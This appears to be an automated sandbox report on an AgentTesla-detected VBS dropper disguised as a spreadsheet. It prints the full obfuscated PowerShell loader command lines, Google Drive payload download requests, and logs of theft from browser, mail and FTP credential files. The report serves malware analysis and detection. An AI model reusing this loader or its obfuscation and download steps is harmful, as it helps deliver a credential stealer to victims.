lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: lanhshrinecanonnsupersmetapieskaddpostidplagier,klarrke,a=s.mmen aucdeh.drowvagts-mervro filibv,rmojpejlke usikc ins,tsepar skyttsphytoysldehsfasantbreake staam udls. su inis pae udaet mahd.juncow b steunendb,utotc gla lindkoimisadedagdrncountt cul. ');uudviklet (blomraadne ' mari$fejlbharbejediffen.uppesregnei passdflatmdpip.ielunker cyli. ,nf	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 17_2_00A13675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

17_2_00A13675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
64.233.185.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
74.125.136.100	drive.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
drive.google.com	74.125.136.100	true
drive.usercontent.google.com	64.233.185.132	true
api.ipify.org	172.67.74.152	true
ip-api.com	208.95.112.1	true
mail.myhydropowered.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://ip-api.com/line/?fields=hosting	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

ReversingLabs: Detection: 37%

Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.136.100:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49713 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YcoJxnONWB6oxPu1_87yG9QwC5hdAtbR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ma
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
